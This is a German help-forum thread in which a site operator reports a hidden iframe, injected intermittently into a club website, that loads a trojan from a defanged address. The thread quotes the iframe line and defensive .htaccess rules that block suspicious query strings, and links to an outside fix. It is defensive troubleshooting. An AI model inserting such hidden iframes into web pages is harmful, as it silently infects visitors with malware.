Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Trojaner wird per iframe auf Website eingebunden

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 05.10.2010, 19:35   #1
Tribun
 
Trojaner wird per iframe auf Website eingebunden - Standard

Trojaner wird per iframe auf Website eingebunden



Hallo zusammen,

mein Problem hat weniger in einem infizierten PC zu tun, sondern mit einer Website, die einen Trojaner verbreitet.

Sachverhalt ist folgender:
Auf der Website hxxp://xxx.tus-obermuenstertal.de wird seit ca. 1 Woche im Seitenquelltext ein
Code:
ATTFilter
<iframe src="hxxp://****/download/index.php?next=4&acc=170&action=cleaner&offset=1&xml=hidden" style="display:none"></iframe>
         
eingebunden. (Siehe kompletter Quelltext Anhang 2010-10-04 17-02 Quelltext.txt)
Diese Links wechseln auch, es sind nicht immer die gleichen. Dieser ladet dann einen Trojaner auf den Dektop. Siehe Anhang „2010-09-28 Virus log.txt“ Das Problem, bzw. die Schwierigkeit den fehlerhaften Code zu finden, ist das der Fehler nicht reproduzierbar ist. Der iframe wird nur sehr selten (ca. 1x am Tag) eingebunden.

Soweit zu den Folgen, weiter mit den Lösungsansätzen:
Im ersten Schritt wurde von uns die Datenbank und der Server nach Auffälligkeiten gescannt. Auch die ftp Logs ergaben keine Auffälligkeiten. Die Templates, html, php und css Dateien sind auch in Ordnung.

Als nächstens ein Anruf beim Serverbetreiber, der sich freundlicherweise dem Problem annahm und nochmals die Datenbank und ftp Inhalte nach „iframe“ bzw. „iframe =scr“ gescannt hat. Wieder keine Lösung gefunden. Hierbei wurde vom Support die .htaccess Datei mit folgenden Einträgen ergänzt:
Code:
ATTFilter
RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)=ftp(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]
         
diese dienen aber nur der Unterdrückung, das Problem selbst wird dadurch aber nicht gelöst.

Dann wurde von uns der komplette Seiteninhalt lokal mit mehreren Virenscannern duchleuchtet und auch nichts gefunden.

Da ich momentan bin ich wirklich ratlos wie der Schadcode auf die Seite kommen kann, würde ich mich über Ratschläge, Tipps, oder mögliche Lösungswege sehr freuen.
Angehängte Dateien
Dateityp: txt 2010-09-28 Virus log.txt (1,2 KB, 211x aufgerufen)

Alt 06.10.2010, 19:10   #2
Tribun
 
Trojaner wird per iframe auf Website eingebunden - Standard

Trojaner wird per iframe auf Website eingebunden



Hallo,

die Lösung des Problems ist in folgendem Beitrag zu lesen:

hxxp://modxcms.com/forums/index.php/topic,52543.0.html

Grüße, Tribun
__________________


Antwort

Themen zu Trojaner wird per iframe auf Website eingebunden
cleaner, code, css, dateien, einträge, folge, ftp, hallo zusammen, html, infizierte, links, lokal, nichts, problem, quelltext, ratlos, scanner, schadcode, seite, server, tan, tipps, trojaner, virenscanner, virus, wechseln



Ähnliche Themen: Trojaner wird per iframe auf Website eingebunden


  1. Merkwürdige Website wird in Chrome angezeigt
    Plagegeister aller Art und deren Bekämpfung - 03.07.2014 (7)
  2. Website wird von Avast blockiert - Trojaner Warnung
    Log-Analyse und Auswertung - 01.12.2013 (1)
  3. Eigene Website (Blog) wird von Avast Anti Virus blockiert (Infektion: URL:MAL)
    Plagegeister aller Art und deren Bekämpfung - 18.09.2013 (5)
  4. hxxp://ww94.btosjs.info wird immer nach irgend einer aufgerufenen website geöffnet
    Plagegeister aller Art und deren Bekämpfung - 29.08.2013 (1)
  5. JS/IFrame.JB Trojaner eingefangen
    Log-Analyse und Auswertung - 30.07.2013 (5)
  6. trojan-downloader.js.iframe.deb auf Website
    Plagegeister aller Art und deren Bekämpfung - 09.06.2013 (9)
  7. Mal/Iframe-V (trojaner-board.de)
    Lob, Kritik und Wünsche - 24.02.2013 (1)
  8. Trojaner JS:Iframe-UC (trj)
    Plagegeister aller Art und deren Bekämpfung - 25.11.2012 (1)
  9. (3x) Trojaner JS/iFrame.byo.3
    Mülltonne - 15.08.2012 (1)
  10. Trojaner auf Web-Starseite?! js:Iframe-DA [Trj]
    Plagegeister aller Art und deren Bekämpfung - 07.12.2011 (4)
  11. beim oeffnen einer website wird eine weitere site geoeffnet die nicht angezeigt werden kann
    Plagegeister aller Art und deren Bekämpfung - 23.09.2011 (6)
  12. Beim öffnen einer Website wird eine weitere site geöffnet die nicht angezeigt werden kann
    Plagegeister aller Art und deren Bekämpfung - 10.01.2011 (14)
  13. Website wird nach Serverwechsel umgeleitet auf als attackierend gemeldete Site
    Alles rund um Windows - 24.06.2010 (1)
  14. iframe Trojaner
    Plagegeister aller Art und deren Bekämpfung - 11.09.2009 (1)
  15. "system-defender"-Website wird undaufgefordert geöffnet
    Mülltonne - 29.06.2008 (0)
  16. Bestimmte Website wird von keinem Browser mehr geöffnet - kein Server...!
    Plagegeister aller Art und deren Bekämpfung - 29.06.2008 (13)
  17. Virus, vermutlich IFrame auf website!
    Plagegeister aller Art und deren Bekämpfung - 06.05.2008 (1)

Zum Thema Trojaner wird per iframe auf Website eingebunden - Hallo zusammen, mein Problem hat weniger in einem infizierten PC zu tun, sondern mit einer Website, die einen Trojaner verbreitet. Sachverhalt ist folgender: Auf der Website hxxp://xxx.tus-obermuenstertal.de wird seit ca. - Trojaner wird per iframe auf Website eingebunden...
Archiv
Du betrachtest: Trojaner wird per iframe auf Website eingebunden auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.